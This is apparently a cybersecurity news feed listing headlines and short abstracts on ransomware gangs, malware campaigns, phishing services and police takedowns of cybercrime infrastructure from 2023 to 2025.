
Criminals


June 7, 2025

Paste.ee Abuse Uncovered: XWorm & AsyncRAT Infrastructure Full Text

Abstract Cybercriminals are exploiting the trusted text-sharing platform Paste.ee to deliver sophisticated malware strains, including XWorm and AsyncRAT. These campaigns leverage phishing emails and social engineering to distribute malicious payloads.

Hunt


June 2, 2025

Police takes down AVCheck site used by cybercriminals to scan malware Full Text

Abstract An international law enforcement operation has dismantled AVCheck, a major Counter Antivirus (CAV) service used by cybercriminals to test malware against commercial antivirus solutions.

Bleeping Computer


June 2, 2025

U.S. DoJ Seizes 4 Domains Supporting Cybercrime Crypting Services in Global Operation Full Text

Abstract On May 27, 2025, a coordinated international law enforcement operation led by the DoJ, in collaboration with Dutch and Finnish authorities, resulted in the seizure of three publicly disclosed domains—AvCheck[.]net, Cryptor[.]biz, and Crypt[.]guru.

The Hacker News


May 29, 2025

Cybercriminals camouflaging threats as AI tool installers Full Text

Abstract Cybercriminals are distributing malware disguised as AI tool installers, targeting users seeking AI solutions. Cisco Talos has identified three major threats: CyberLock ransomware, Lucky_Gh0$t ransomware, and a destructive malware named Numero.

Talos Intelligence


May 24, 2025

Global Takedown Disrupts Danabot Malware-as-a-Service Infrastructure Full Text

Abstract The FBI, DoD, and international partners dismantled Danabot’s infrastructure and identified key operators. Danabot was used to distribute malware like LockBit, Ursnif, and Zloader.

We Live Security


May 16, 2025

Ransomware gang INC claims recent attack on South African Airways - Comparitech Full Text

Abstract South African Airways (SAA) has confirmed a cyberattack on May 3, 2025, which temporarily disrupted its website, mobile app, and internal systems. The ransomware group INC has claimed responsibility, labeling the initial data leak as “Part 1.”

Cyware


May 15, 2025

Defending Against UNC3944: Cybercrime Hardening Guidance from the Frontlines Full Text

Abstract A new wave of ransomware and extortion attacks is targeting the US retail sector, with threat intelligence suggesting the involvement of the advanced threat actor group Scattered Spider (UNC3944).

Google


May 15, 2025

The Internet’s Biggest-Ever Black Market Just Shut Down Amid a Telegram Purge Full Text

Abstract In a major disruption to global cybercrime infrastructure, the notorious Haowang Guarantee (formerly Huione Guarantee) black market has been shut down following Telegram’s enforcement action.

Wired


May 10, 2025

Ransomware gang says it hacked the Sheriff of Hamilton County, TN Full Text

Abstract The Qilin ransomware gang claimed responsibility for a cyberattack on the Hamilton County Sheriff’s Office in Chattanooga, Tennessee, on April 14, 2025. The sheriff’s office stated that the attackers demanded a $300,000 ransom, which was not paid.

CompariTech


May 9, 2025

Kickidler employee monitoring software abused in ransomware attacks Full Text

Abstract Ransomware groups Qilin and Hunters International are abusing Kickidler, a legitimate employee monitoring tool used by over 5,000 organizations across 60 countries, to conduct stealthy reconnaissance and credential harvesting.

Bleeping Computer


May 7, 2025

Digital welfare fraud: ALTSRUS syndicate exploits the financially vulnerable Full Text

Abstract A newly uncovered fraud syndicate named ALTSRUS is exploiting vulnerable segments of the digital economy by stealing and reselling accounts tied to Electronic Benefit Transfer (EBT), pharmacy prescriptions, and consumer rewards programs.

Help Net Security


May 5, 2025

Rhysida Ransomware gang claims the hack of the Government of Peru Full Text

Abstract The Rhysida ransomware group has claimed responsibility for breaching the Government of Peru’s official digital platform, Gob.pe. The group published images of multiple documents allegedly stolen from the platform on May 2, 2025.

Security Affairs


April 28, 2025

JokerOTP Dismantled After 28,000 Phishing Attacks, 2 Arrested Full Text

Abstract Two individuals have been arrested in a joint international operation dismantling JokerOTP, a sophisticated phishing tool used to intercept 2FA codes and steal over £7.5 million.

HackRead


April 25, 2025

How NFC-Enabled POS Terminals Facilitate Cybercriminal Money Laundering Chains Full Text

Abstract Chinese cybercriminals are especially active in NFC-enabled fraud and are known for their well-established money laundering chains across multiple continents. They arrange for an NFC-enabled POS terminal and a merchant account linked to it.

RESecurity


April 21, 2025

SheByte PaaS Launches Subscription Service for Cybercriminals Full Text

Abstract Launched in June 2024, SheByte has rapidly gained traction among cybercriminals by offering customizable phishing kits and a subscription model, signaling a durable presence in the threat landscape.

GBHackers


April 18, 2025

Look out! CapCut copycats are on the prowl Full Text

Abstract Cybercriminals are exploiting the popularity of AI-powered content creation tools by deploying fake websites that impersonate platforms like CapCut, Adobe Express, and Canva.

WeLive Security


April 10, 2025

Moroccan Cybercrime Group Atlas Lion Hiding in Plain Sight During Attacks on Retailers Full Text

Abstract The Atlas Lion group used stolen credentials to enroll its own virtual machines (VMs) into an organization’s cloud domain, according to researchers at cybersecurity firm Expel.

The Record


April 8, 2025

EncryptHub’s Dual Life Between Cybercrime and Windows Bug Bounty Research Uncovered Full Text

Abstract A new report by Outpost24 researchers linked the EncryptHub threat actor with SkorikARI, the account that reported CVE-2025-24061 and CVE-2025-24071, after they allegedly infected themselves and exposed their credentials.

Bleeping Computer


April 5, 2025

Smishing Triad is Now Targeting Toll Payment Services in a Massive Fraud Campaign Expansion Full Text

Abstract The Smishing Triad group has been linked to a surge in smishing campaigns targeting the U.S. and the U.K. The fraudulent text messages claim unpaid toll bills or payment requests related to toll services like FasTrak, E-ZPass, and I-Pass.

ReSecurity


April 5, 2025

Hunters International Dumps Ransomware, Goes Full-on Extortion Full Text

Abstract The decision appears to come in the wake of international law enforcement operations over the past two years with names like Endgame, Morpheus, Cronos, and Magnus that disrupted the operations of cybercriminal groups.

Security Boulevard


March 28, 2025

Hackers Repurpose RansomHub’s EDRKillShifter in Medusa, BianLian, and Play Attacks Full Text

Abstract A new analysis has uncovered connections between affiliates of RansomHub and other ransomware groups like Medusa, BianLian, and Play. The connection stems from the use of EDRKillShifter to disable endpoint security software, according to ESET.

The Hacker News


March 27, 2025

BlackLock Ransomware Operation Disrupted by Cybersecurity Firm Full Text

Abstract Resecurity discovered a local file inclusion flaw in the data leak site used by BlackLock Ransomware, allowing them to uncover clearnet IP addresses and other details about the cybercriminals' network, aiding in the investigation and disruption.

Security Affairs


March 26, 2025

Researchers Uncover Nearly 200 Unique C2 Domains Linked to Raspberry Robin Access Broker Full Text

Abstract "Raspberry Robin (also known as Roshtyak or Storm-0856) is a complex and evolving threat actor that provides initial access broker (IAB) services to numerous criminal groups, many of which have connections to Russia," Silent Push said in a report.

The Hacker News


March 25, 2025

Over 300 Arrested in International Crackdown on Cyber Scams Full Text

Abstract Law enforcement agencies in seven African countries arrested over 300 suspected cybercriminals involved in mobile banking, investment and messaging app scams, according to a statement on Monday by Interpol.

The Record


March 20, 2025

Leaked Black Basta Chats Suggest Russian Officials Aided Leader’s Escape from Armenia Full Text

Abstract The recently leaked trove of internal chat logs among members of the Black Basta ransomware operation has revealed possible connections between the e-crime gang and Russian authorities.

The Hacker News


March 15, 2025

Crypto Traps, Fake Giveaways Trick Victims During Ramadan Full Text

Abstract Cybercriminals use deceptive tactics to target individuals and organizations during Ramadan, employing fraudulent donation requests, fake giveaways, and cryptocurrency schemes.

Security Online


March 14, 2025

Zservers: Bulletproof Hosting for Online Crime Full Text

Abstract Zservers has operated in the open for more than a dozen years, facilitating connectivity for numerous ransomware affiliates and brands including LockBit, BianLian, Hunters International, and other fraudsters.

Intel 471


March 12, 2025

Researchers Investigate Potential Links Between Belsen and ZeroSevenGroup Full Text

Abstract The Belsen Group surfaced in January 2025, leaking Fortinet data and selling network access, while ZeroSevenGroup had been active earlier, breaching companies and monetizing stolen data.

Kela


March 10, 2025

Microsoft Warns of North Korean Hackers Joining Qilin Ransomware Gang Full Text

Abstract "Moonstone Sleet has previously exclusively deployed their own custom ransomware in their attacks, and this represents the first instance they are deploying ransomware developed by a RaaS operator," Microsoft researchers said.

Bleeping Computer


March 5, 2025

Update: North Korean Hackers Finish Initial Laundering Stage After Stealing Over $1 Billion From Bybit Full Text

Abstract Experts from multiple blockchain security companies said Monday that the hackers were able to move all of the stolen ETH coins to new addresses — the first step taken before the funds can be laundered further.

The Record


March 5, 2025

North Korean Fake IT Workers Leverage GitHub to Build Personas Full Text

Abstract Researchers tracked a global network of IT workers posing as Vietnamese, Japanese, and Singaporean nationals attempting to obtain employment in remote engineering and full-stack blockchain developer positions in Japan and the US.

Infosecurity Magazine


February 20, 2025

BlackLock Becomes the World’s Fastest Rising Ransomware Operator Full Text

Abstract BlackLock actively recruits key players, known as traffers, to support the early stages of ransomware attacks. These individuals drive malicious traffic, steer victims to harmful content, and help establish initial access for campaigns.

Reliaquest


February 11, 2025

Police Dismantles 8Base Ransomware Gang Under Operation Phobos Aetor Full Text

Abstract The police arrested four European citizens in Phuket, Thailand, who are suspected of having stolen over $16 million through ransomware attacks affecting over 1,000 victims worldwide.

Security Affairs


February 6, 2025

XE Group Goes From Credit Card Skimming to Exploiting Zero-Days Full Text

Abstract A Vietnamese cybercrime group, XE Group, has changed its tactics from focusing on credit card skimming to exploiting zero-day vulnerabilities in a widely used software called VeraCore. This software is used to manage orders and operations.

Intezer


February 6, 2025

TAG-124 Traffic Distribution System Powers Multiple Malware Campaigns Full Text

Abstract The TDS network comprises compromised WordPress websites, actor-controlled payload servers, and a sophisticated management system, allowing cybercriminals to dynamically route traffic to malicious content while evading detection.

Security Online


February 5, 2025

Cybercriminals Aim to Lure Traitorous Insiders via Ransom Notes Full Text

Abstract Ransomware actors are now using a new tactic by offering individuals millions of dollars to betray their employers and share confidential company information. These actors include groups like Sarcoma and DoNex.

Dark Reading


January 31, 2025

FBI Seizes Cracked.io, Nulled.to Hacking Forums in Operation Talent Full Text

Abstract The FBI has seized the domains for the infamous Cracked.io and Nulled.to hacking forums, which are known for their focus on cybercrime, password theft, cracking, and credential stuffing attacks.

Bleeping Computer


January 14, 2025

Attackers are encrypting AWS S3 data without using ransomware Full Text

Abstract A ransomware gang dubbed Codefinger is encrypting data stored in target organizations’ AWS S3 buckets with AWS’s server-side encryption option with customer-provided keys (SSE-C), and asking for money to hand over the key they used.

Help Net Security


December 24, 2024

Major Biometric Data Farming Operation Uncovered Full Text

Abstract Security researchers have urged customer-facing businesses to improve their verification checks after discovering a large-scale identity farming operation on the dark web.

Infosecurity Magazine


December 17, 2024

Crypted Hearts: Exposing the HeartCrypt Packer-as-a-Service Operation Full Text

Abstract The majority of HeartCrypt customers are malware operators using families such as LummaStealer, Remcos, and Rhadamanthys. However, researchers also observed payloads from a wide variety of other crimeware families.

Palo Alto Networks


December 14, 2024

Cybercriminal Marketplace Rydox Seized in International Law Enforcement Operation Full Text

Abstract The operation was carried out by the FBI’s Pittsburgh Office, Albania’s Special Anti-Corruption Body (SPAK) and its National Bureau of Investigation (BKH), the Kosovo Special Prosecution Office, the Kosovo Police, and the Royal Malaysian Police.

Cyber Scoop


December 10, 2024

Cybercrime gang arrested after turning Airbnbs into fraud centers Full Text

Abstract According to the Dutch police, the fraudsters rent Airbnb properties and luxury apartments to use as temporary call centers from where they launched phishing campaigns. They contacted victims across Europe using email, SMS, or WhatsApp messages.

Bleeping Computer


December 6, 2024

Europol Shuts Down Manson Market Fraud Marketplace, Seizes 50 Servers Full Text

Abstract Manson Market ("manson-market[.]pw") is believed to have launched in 2022 as a way to peddle sensitive information that was illegally obtained from victims as part of phishing and vishing (voice phishing) schemes.

The Hacker News


December 5, 2024

Criminals Use Generative Artificial Intelligence to Facilitate Financial Fraud Full Text

Abstract Attackers use AI-generated text to appear believable to a reader to push social engineering, spear phishing, and financial fraud schemes such as romance, investment, and other confidence schemes or to hide common indicators of fraud schemes.

IC3


December 5, 2024

Authorities Shut Down Crimenetwork, Germany’s Largest Crime Marketplace Full Text

Abstract The operation was carried out by Public Prosecutor’s Office in Frankfurt am Main, the Central Office for Combating Cybercrime (ZIT), and the Federal Criminal Police Office (BKA).

Security Affairs


December 3, 2024

Korea Arrests CEO for Adding DDoS Feature to Satellite Receivers Full Text

Abstract South Korean police have arrested a CEO and five employees for manufacturing over 240,000 satellite receivers pre-loaded or later updated to include DDoS attack functionality at a purchaser's request.

Bleeping Computer


December 3, 2024

Ransomware suspect Wazawaka reportedly arrested by Russia Full Text

Abstract Russian authorities have charged a high-profile hacker for creating malware used to blackmail commercial organizations, the Russian interior ministry said in a statement late last week.

The Record


December 2, 2024

INTERPOL Arrests 5,500 in Global Cybercrime Crackdown, Seizes Over $400 Million Full Text

Abstract The coordinated exercise saw the participation of authorities from 40 countries, territories, and regions as part of the latest wave of Operation HAECHI-V, which took place between July and November 2024, INTERPOL said.

The Hacker News


November 26, 2024

Cybercriminals Turn to Pen Testers to Test Ransomware Efficiency Full Text

Abstract Any good developer knows that software needs to be tested before deploying in production environments. This is also true for ransomware gangs. They want to ensure that their ransomware can be deployed successfully against organizations.

Help Net Security


November 20, 2024

Cybercriminals Exploit Weekend Lull to Launch Ransomware Attacks Full Text

Abstract Ransomware gangs are increasingly targeting weekends and holidays, when cybersecurity teams are typically less staffed, according to a new report. 86% of study participants who experienced a ransomware attack were targeted on a weekend or holiday.

Infosecurity Magazine


November 19, 2024

Ransomware Gangs on Recruitment Drive for Pen Testers Full Text

Abstract Threat actors are actively seeking pen testers to join various ransomware affiliate programs, including Apos, Lynx and Rabbit Hole. Now, ransomware gangs are hiring people with the same level of expertise.

Infosecurity Magazine


November 19, 2024

Ransomware gang Akira leaks unprecedented number of victims’ data in one day Full Text

Abstract Akira, a ransomware-as-a-service gang with a growing profile in the cybercrime underworld, has published a record number of new victims to its darknet leak site in a single day, and more apparently still being added.

The Record


November 7, 2024

Suspect Behind Snowflake Data-Theft Attacks Arrested in Canada Full Text

Abstract The investigations by Snowflake, Mandiant, and CrowdStrike revealed that an attacker known as UNC5537 utilized stolen customer credentials to target organizations that lacked multi-factor authentication protection on their Snowflake accounts.

Bleeping Computer


November 7, 2024

Massive Nigerian Cybercrime Bust Sees 130 Arrested Full Text

Abstract In a massive law enforcement operation, the Nigeria Police Force (NPF) has arrested 130 individuals over cybercrime accusations. Prince Olumuyiwa Adejobi, the NPF public relations officer, announced the arrests on X on November 3.

Infosecurity Magazine


October 30, 2024

Redline, Meta Infostealer Malware Operations Seized by Police Full Text

Abstract The Dutch National Police, in collaboration with the FBI and other international agencies, have successfully gained full access to the servers used by the Redline and Meta infostealers.

Bleeping Computer


October 17, 2024

Brazil’s Polícia Federal Arrested the Notorious Hacker USDoD Full Text

Abstract Brazil's Polícia Federal has arrested hacker USDoD, known for breaches of National Public Data and InfraGard portals. CrowdStrike identified USDoD as Luan BG, a 33-year-old Brazilian man from Minas Gerais.

Security Affairs


October 17, 2024

Sri Lankan Police Arrest Over 200 Chinese Scammers Full Text

Abstract Sri Lankan authorities have arrested over 200 Chinese nationals for overstaying their visitor visas and participating in financial scams targeting victims in Asia. Raids led to the arrest of cybercriminals conducting pig-butchering scams.

Healthcare Infosecurity


October 14, 2024

Bohemia and Cannabia Dark Web Markets Taken Down After Joint Police Operation Full Text

Abstract The Dutch police have dismantled Bohemia and Cannabia, considered the world's largest dark web market for illegal goods, drugs, and cybercrime. This action resulted from a joint investigation involving Ireland, the UK, and the US.

The Hacker News


September 19, 2024

Marko Polo Cybercrime Gang Targets Cryptocurrency Users, Influencers With Scams Full Text

Abstract The group primarily focuses on online gaming personalities, cryptocurrency influencers, and technology professionals, enticing them with fake job opportunities on social media that lead to downloading malicious software.

The Record


September 12, 2024

New RansomHub Attack Uses TDSSKiller and LaZagne, Disables EDR Full Text

Abstract The RansomHub ransomware gang has been found using Kaspersky's TDSSKiller tool to disable EDR software on target systems, allowing for credential harvesting with LaZagne.

Threat Down


September 10, 2024

Poland Dismantles Cyber Sabotage Group Linked to Russia, Belarus Full Text

Abstract Poland has dismantled a cyber sabotage group with links to Russia and Belarus. The group attempted to disrupt the country through cyberattacks, extorting information from local government agencies and state companies related to security matters.

The Record


September 3, 2024

Researchers Link ManticoraLoader Malware to Ares Malware Developer Full Text

Abstract Researchers have traced the new ManticoraLoader malware-as-a-service (MaaS) to the cybercriminal group 'DarkBLUP,' previously associated with distributing AresLoader and AiDLocker ransomware from the DeadXInject group.

The Cyber Express


August 30, 2024

Cybercriminals Capitalize on Travel Industry’s Peak Season Full Text

Abstract Cequence Security found that cyberattacks against the travel industry surge during holidays, with 91% of severe vulnerabilities in the top 10 travel and hospitality sites enabling man-in-the-middle attacks.

Help Net Security


August 29, 2024

Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations Full Text

Abstract The Pioneer Kitten attackers are monetizing their access to compromised organizations' networks by selling domain admin credentials and full domain control privileges on cybercrime marketplaces.

CISA


August 24, 2024

Greasy Opal’s CAPTCHA Solver Still Serving Cybercrime After 16 Years Full Text

Abstract Greasy Opal, a well-known developer, has been aiding cybercriminals for 16 years by offering a tool that can solve CAPTCHAs automatically on a large scale, bypassing security measures.

Bleeping Computer


August 19, 2024

Mad Liberator Gang Uses Fake Windows Update Screen to Hide Data Theft Full Text

Abstract A new cybercrime group named Mad Liberator has been identified by the Sophos X-Ops Incident Response team for targeting AnyDesk users. This ransomware group is using a fake Microsoft Windows update screen to hide their data exfiltration activities.

Bleeping Computer


August 19, 2024

Researchers Uncover New Infrastructure Tied to FIN7 Cybercrime Group Full Text

Abstract Researchers have uncovered new infrastructure connected to the financially motivated threat actor FIN7. The analysis reveals communications inbound to FIN7 infrastructure from IP addresses assigned to Post Ltd in Russia and SmartApe in Estonia.

The Hacker News


August 15, 2024

Black Basta Ransomware Gang Linked to a Malware Campaign Full Text

Abstract The attacks, detected on June 20, 2024, show threat actors using various tools like AnyDesk and AntiSpam.exe to harvest credentials. They also deploy payloads like Golang HTTP beacons and Socks proxy beacons.

Security Affairs


August 14, 2024

Prolific Malvertising Scammer Arrested and Extradited to US to Face Charges Full Text

Abstract Maxim Silnikau, a Belarusian-Ukrainian cybercriminal dubbed one of the most prolific Russian-speaking hackers by the UK's NCA, has been arrested in Spain and extradited to the US.

The Record


August 14, 2024

Feds Seize Radar/Dispossessor Ransomware Gang Servers in US and Europe Full Text

Abstract Federal authorities have seized servers belonging to the Radar/Dispossessor ransomware gang in the U.S. and Europe. The FBI dismantled dozens of servers linked to the group, which is believed to have ties to the LockBit ransomware enterprise.

The Record


August 9, 2024

US Offers $10 Million for Information on Iranian Hackers Behind CyberAv3ngers Water Utility Attacks Full Text

Abstract The U.S. State Department has offered a $10 million reward for information on six Iranian government hackers who allegedly targeted U.S. water utilities last fall. These individuals were previously sanctioned for targeting critical infrastructure.

The Record


August 2, 2024

Suspects in ‘Russian Coms’ Spoofing Service Arrested in London, as NCA Announces Takedown Full Text

Abstract The caller ID spoofing service, which was established in 2021, is believed to have caused financial losses in the tens of millions and had around 170,000 victims in Britain.

The Record


July 31, 2024

Researchers Study Evolution of Ransomware Gang UNC4393’s Campaigns After Qakbot Takedown Full Text

Abstract Initially relying on Qakbot botnet infections, UNC4393 now uses custom malware and diverse access techniques after the crackdown on Qakbot. They have quick reconnaissance and encryption objectives, with a median time of 42 hours to ransomware.

The Cyber Express


July 22, 2024

UK Arrests Suspected Scattered Spider Hacker Linked to MGM Attack Full Text

Abstract A 17-year-old boy from Walsall has been arrested by UK police for his involvement in the 2023 MGM Resorts ransomware attack, connected to the Scattered Spider hacking group. The arrest was made with assistance from the NCA and the FBI.

Bleeping Computer


July 12, 2024

The Stark Truth Behind the Resurgence of Russia’s FIN7 Full Text

Abstract FIN7, a cybercrime group responsible for billions in losses, was dismantled by U.S. authorities in 2023. However, they resurfaced in 2024 with Stark Industries Solutions, hosting thousands of fake websites mimicking renowned companies.

Krebs On Security


July 12, 2024

Ransomware Gangs Invest in Custom Data Stealing Malware Full Text

Abstract Ransomware gangs are now creating custom data-stealing malware instead of just encrypting files. Mature crime organizations are investing in bespoke data theft tools, according to a Cisco Talos report on the top 14 ransomware groups.

The Register


July 10, 2024 – Phishing

Regional Transport Office Themed Phishing Campaign Targets Android Users In India Full Text

Abstract Phishing messages impersonating the Regional Transport Office have been circulating since 2024, claiming traffic violations and prompting users to download a malicious APK named "VAHAN PARIVAHAN.apk".

Cyble


As CISOs Grapple with the C-Suite, Job Satisfaction Takes a Hit Full Text

Abstract Research shows that 75% of CISOs are considering a job change due to various challenges and pressures. CISOs often face accountability for cyber incidents and compliance failures, leading to discontent.

Cybersecurity Dive


August 31, 2023

Unmasking Trickbot, One of the World’s Top Cybercrime Gangs Full Text

Abstract Maksim Sergeevich Galochkin, a member of the Russian cybercrime syndicate Trickbot, has been identified by cybercrime researchers. The identification of Galochkin comes after a comprehensive investigation into leaked data from the Trickbot group.

Cyware


August 30, 2023

Pay Our Ransom Instead of GDPR Fine, Cybercrime Gang Tells Its Targets Full Text

Abstract The hackers behind Ransomed are probably linked to other data leak websites like BreachForums and Exposed, Flashpoint said. Some of these sites have shut down due to money problems or poor management, the researchers said.

Cyware


August 29, 2023

Web Control, Crime Patrol or Real Pawns in Cybercrime Full Text

Abstract A group of young employees in Hyderabad ran a sophisticated scam using VOIP to target unsuspecting people in the U.S. and trick them into buying gift cards, which were then converted into cryptocurrency and Indian Rupees.

Cyware


August 26, 2023

Adversary On The Defense: ANTIBOT.PW Full Text

Abstract The Antibot web traffic filtering service, originally a GitHub project, has evolved into a commercial platform for malicious actors, offering features like cloaking to evade analysis and prolong phishing and malware campaigns.

Cyware


August 26, 2023

Update: Prospect Medical Stolen Data Listed for Sale by Emerging Ransomware Group Full Text

Abstract The Rhysida ransomware group claimed responsibility for a ransomware attack against Prospect Medical Holdings that forced multiple hospital closures earlier this month and continues to impact operations.

Cyware


August 22, 2023

MOVEit Attack Spree Makes Clop This Summer’s Most-Prolific Ransomware Group Full Text

Abstract Clop was responsible for one-third of all ransomware attacks in July, positioning the financially-motivated threat actor to become the most prolific ransomware threat actor this summer, according to multiple threat intelligence reports.

Cyware


August 22, 2023

Akira ransomware gang spotted targeting Cisco VPN products to hack organizations Full Text

Abstract The Akira ransomware gang targets Cisco VPN products to gain initial access to corporate networks and steal their data. The Akira ransomware has been active since March 2023; the threat actors behind the malware claim to have already hacked multiple...

Security Affairs


August 22, 2023

Snatch gang claims the hack of the Department of Defence South Africa Full Text

Abstract Snatch gang claims the hack of the Department of Defence South Africa and added the military organization to its leak site. The Snatch ransomware group added the Department of Defence South Africa to its data leak site. The mission of the Department...

Security Affairs


August 21, 2023

Researchers Uncover Real Identity of CypherRAT and CraxsRAT Malware Developer Full Text

Abstract The CraxsRAT builder, Cyfirma says, generates highly obfuscated packages, allowing threat actors to customize the contents based on the type of attack they are preparing, including with WebView page injections.

Cyware


August 21, 2023

Australia’s .AU Domain Administrator Denies Data Breach After Ransomware Posting Full Text

Abstract The organization that manages Australia’s internet domain .au denied that it was affected by a data breach on Friday after a ransomware gang added it to their list of victims.

Cyware


August 19, 2023

Ransomware Gang Threatens Raleigh Housing Authority Months After Devastating Attack Full Text

Abstract A ransomware gang has started posting sensitive personal information connected to a devastating attack on the Raleigh Housing Authority (RHA) that disrupted the organization for weeks in May.

Cyware


August 19, 2023

Update: Man Arrested in Northern Ireland Police Data Leak Full Text

Abstract The unnamed man was questioned by detectives who were said to be "investigating criminality linked to last week's freedom of information data breach," but has now been released on bail to allow for further inquiries, the PSNI stated.

Cyware


August 18, 2023

14 Suspected Cybercriminals Arrested Across Africa in Coordinated Crackdown Full Text

Abstract A coordinated law enforcement operation across 25 African countries has led to the arrest of 14 suspected cybercriminals, INTERPOL announced Friday. The exercise, conducted in partnership with AFRIPOL, enabled investigators to identify 20,674 cyber networks that were linked to financial losses of more than $40 million. "The four-month Africa Cyber Surge II operation was launched in April 2023 and focused on identifying cybercriminals and compromised infrastructure," the agency said. As part of the operation, three suspects were arrested in Cameroon in connection with an online scam involving the fraudulent sale of works of art worth $850,000. Another suspect was arrested in Nigeria for defrauding a Gambian victim. Also arrested were two money mules linked to scams initiated through messaging platforms. The cyber networks comprised 3,786 command-and-control (C2) servers, 14,134 victim IP addresses tied to data stealer infections, 1,415 phishing links and domains, 939

The Hacker News


August 17, 2023

Cybercriminals Selling SMS Bomber Attack Tools on Underground Forums Full Text

Abstract The underground market for SMS Bomber services is thriving, with various platforms offering attack services for a fee, highlighting the need for increased security measures in registration pages and APIs.

Cyware


August 15, 2023

Cybercriminals Abusing Cloudflare R2 for Hosting Phishing Pages, Experts Warn Full Text

Abstract Threat actors' use of Cloudflare R2 to host phishing pages has witnessed a 61-fold increase over the past six months. "The majority of the phishing campaigns target Microsoft login credentials, although there are some pages targeting Adobe, Dropbox, and other cloud apps," Netskope security researcher Jan Michael said. Cloudflare R2, analogous to Amazon Web Service S3, Google Cloud Storage, and Azure Blob Storage, is a data storage service for the cloud. The development comes as the total number of cloud apps from which malware downloads originate has increased to 167, with Microsoft OneDrive, Squarespace, GitHub, SharePoint, and Weebly taking the top five spots. The phishing campaigns identified by Netskope not only abuse Cloudflare R2 to distribute static phishing pages, but also leverage the company's Turnstile offering, a CAPTCHA replacement, to place such pages behind anti-bot barriers to evade detection. In doing so, it prevents online scanners like

The Hacker News


August 15, 2023

Credentials for cybercrime forums found on roughly 120K computers infected with info stealers Full Text

Abstract Researchers discovered credentials associated with cybercrime forums on roughly 120,000 computers infected with information stealers. Threat intelligence firm Hudson Rock has discovered credentials associated with cybercrime forums on roughly 120,000...

Security Affairs


August 15, 2023

Monti Ransomware Returns with New Linux Variant and Enhanced Evasion Tactics Full Text

Abstract The threat actors behind the Monti ransomware have resurfaced after a two-month break with a new Linux version of the encryptor in its attacks targeting government and legal sectors. Monti emerged in June 2022, weeks after the Conti ransomware group shut down its operations, deliberately imitating the tactics and tools associated with the latter, including its leaked source code. Not anymore. The new version, per Trend Micro, is a departure of sorts, exhibiting significant changes from its other Linux-based predecessors. "Unlike the earlier variant, which is primarily based on the leaked Conti source code, this new version employs a different encryptor with additional distinct behaviors," Trend Micro researchers Nathaniel Morales and Joshua Paul Ignacio said. A BinDiff analysis has revealed that while the older iterations had a 99% similarity rate with Conti, the latest version has only a 29% similarity rate, suggesting an overhaul. Some of the crucial changes in

The Hacker News


August 15, 2023

Over 120,000 Computers Compromised by Info Stealers Linked to Users of Cybercrime Forums Full Text

Abstract A "staggering" 120,000 computers infected by stealer malware have credentials associated with cybercrime forums, many of them belonging to malicious actors. The findings come from Hudson Rock, which analyzed data collected from computers compromised between 2018 to 2023. "Hackers around the world infect computers opportunistically by promoting results for fake software or through YouTube tutorials directing victims to download infected software," Hudson Rock CTO Alon Gal told The Hacker News. "It is not a case of the threat actor infecting his own computer, it is that out of the 14,500,000 computers we have in our cybercrime database, some of them happen to be hackers that accidentally got infected." Data retrieved from machines compromised by stealer malware is often expansive and wide-ranging, enabling the real-world identities of hackers to be discovered based on indicators such as credentials, addresses, phone numbers, computer names, and IP a

The Hacker News


August 12, 2023

Honor Among Cybercriminals? Why a Canadian Firm Paid Ransom Full Text

Abstract A nonprofit firm that administers government dental programs in Canada is notifying nearly 1.5 million individuals that their data, including banking information for some, was compromised in a ransomware incident last month.

Cyware


August 12, 2023

Lolek Bulletproof Hosting Servers Seized, 5 Key Operators Arrested Full Text

Abstract European and U.S. law enforcement agencies have announced the dismantling of a bulletproof hosting service provider called Lolek Hosted, which cybercriminals have used to launch cyber-attacks across the globe. "Five of its administrators were arrested, and all of its servers seized, rendering LolekHosted.net no longer available," Europol said in a statement. "The service facilitated the distribution of information-stealing malware, and also the launching of DDoS (distributed denial of service) attacks, fictitious online shops, botnet server management, and distribution of spam messages worldwide," it added. Polish authorities, who made the arrests, said three other detainees have been subjected to preventive measures in the form of police supervision, bail, and a ban on leaving the country. Alongside the arrests, hundreds of servers containing terabytes of data, computer equipment, and mobile phones have been confiscated. The seizure, carried out on Augu

The Hacker News


August 11, 2023

California City Investigating Data Theft After Ransomware Group’s Claims Full Text

Abstract The LockBit gang added 15 victims to its leak site on Wednesday including El Cerrito, which is home to more than 25,000 residents and is about 10 minutes north of Oakland.

Cyware


August 10, 2023

IRS Confirms Takedown of Bulletproof Hosting Provider Lolek Full Text

Abstract A popular bulletproof hosting platform was taken down by authorities in the U.S. and Poland this week, marking the latest effort to limit the anonymous access cybercriminals have to critical tools.

Cyware


August 10, 2023

Interpol Busts Phishing-as-a-Service Platform ‘16Shop,’ Leading to 3 Arrests Full Text

Abstract Interpol has announced the takedown of a phishing-as-a-service (PhaaS) platform called 16Shop, in addition to the arrests of three individuals in Indonesia and Japan. 16Shop specialized in the sales of phishing kits that other cybercriminals can purchase to mount phishing attacks on a large scale, ultimately facilitating the theft of credentials and payment details from users of popular services such as Apple, PayPal, American Express, Amazon, and Cash App, among others. "Victims typically receive an email with a pdf file or link that redirects to a site requesting the victims' credit card or other personally identifiable information," Interpol said. "This information is then stolen and used to extract money from the victims." No less than 70,000 users across 43 countries are estimated to have been compromised via services offered on 16Shop. The law enforcement operation has also led to the arrest of the site's administrator, a 21-year-old Indonesian

The Hacker News


August 09, 2023

New Report Exposes Vice Society’s Collaboration with Rhysida Ransomware Full Text

Abstract Tactical similarities have been unearthed between the double extortion ransomware group known as Rhysida and Vice Society, including in their targeting of education and healthcare sectors. "As Vice Society was observed deploying a variety of commodity ransomware payloads, this link does not suggest that Rhysida is exclusively used by Vice Society, but shows with at least medium confidence that Vice Society operators are now using Rhysida ransomware," Check Point said in a new report. Vice Society, tracked by Microsoft under the name Storm-0832, has a pattern of employing already existing ransomware binaries that are sold on criminal forums to pull off their attacks. The financially motivated gang has also been observed resorting to pure extortion-themed attacks wherein the data is exfiltrated without encrypting them. First observed in May 2023, the Rhysida ransomware group is known to rely on phishing attacks and Cobalt Strike to breach targets' networks and

The Hacker News


August 8, 2023

Nigerian Man Admits to $1.3M Business Email Compromise Scam Full Text

Abstract A Nigerian national pleaded guilty to participating in a BEC scheme to steal $1.25m from a Boston investment firm. The scam involved using malware and a spoofed domain name to trick the firm into transferring money to attacker-controlled accounts.

Cyware


August 7, 2023

Cl0p Ransomware Gang Revises its Extortion Strategy Full Text

